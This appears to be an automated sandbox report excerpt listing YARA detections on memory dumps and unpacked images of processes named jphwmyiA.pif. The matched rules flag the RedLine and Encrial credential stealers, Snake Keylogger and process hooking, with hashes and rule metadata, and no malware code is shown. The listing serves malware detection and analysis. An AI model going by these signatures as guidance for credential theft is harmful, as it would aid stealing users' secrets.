                  Source: 15.2.jphwmyiA.pif.1ed60000.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 15.2.jphwmyiA.pif.1ed60000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 10.2.jphwmyiA.pif.20d8a8c6.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 15.2.jphwmyiA.pif.1be499de.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 10.3.jphwmyiA.pif.1f2f18e0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 10.3.jphwmyiA.pif.1f2f18e0.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 15.2.jphwmyiA.pif.1be4a8c6.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 10.2.jphwmyiA.pif.23660000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 10.2.jphwmyiA.pif.23660000.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 10.2.jphwmyiA.pif.23660000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 15.2.jphwmyiA.pif.1ed60000.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 19.2.jphwmyiA.pif.2254a8c6.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 10.2.jphwmyiA.pif.23600ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 10.2.jphwmyiA.pif.20d8a8c6.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 15.2.jphwmyiA.pif.1be499de.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 19.2.jphwmyiA.pif.22770000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 10.1.jphwmyiA.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 19.2.jphwmyiA.pif.2254a8c6.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 15.2.jphwmyiA.pif.1e710ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 10.3.jphwmyiA.pif.1f2f18e0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 15.2.jphwmyiA.pif.1e710ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 15.2.jphwmyiA.pif.1be4a8c6.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 19.2.jphwmyiA.pif.22770000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 15.2.jphwmyiA.pif.1be4a8c6.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 10.1.jphwmyiA.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 15.2.jphwmyiA.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 15.2.jphwmyiA.pif.1be4a8c6.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 15.2.jphwmyiA.pif.1be4a8c6.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 15.2.jphwmyiA.pif.1be4a8c6.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 15.1.jphwmyiA.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 12.2.Aiymwhpj.PIF.211f67a8.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 15.2.jphwmyiA.pif.1be499de.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 15.2.jphwmyiA.pif.1be499de.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 15.2.jphwmyiA.pif.1be499de.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 15.2.jphwmyiA.pif.1e710000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 15.2.jphwmyiA.pif.1e710000.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 15.2.jphwmyiA.pif.1e710000.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 10.2.jphwmyiA.pif.20d8a8c6.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 10.2.jphwmyiA.pif.20d8a8c6.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 10.2.jphwmyiA.pif.20d8a8c6.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 19.3.jphwmyiA.pif.207aee58.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 19.2.jphwmyiA.pif.22770ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 15.2.jphwmyiA.pif.1e710000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 19.3.jphwmyiA.pif.207aee58.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 19.2.jphwmyiA.pif.22770ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 19.3.jphwmyiA.pif.207aee58.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 19.2.jphwmyiA.pif.22770ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 15.2.jphwmyiA.pif.1e710000.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 19.3.jphwmyiA.pif.207aee58.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 15.2.jphwmyiA.pif.1e710000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 19.3.jphwmyiA.pif.207aee58.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 19.3.jphwmyiA.pif.207aee58.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000013.00000001.2327344722.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0000000A.00000002.3731530309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000013.00000002.3731782871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000F.00000001.2248691179.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0000000F.00000002.3731678723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000A.00000001.2128731771.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
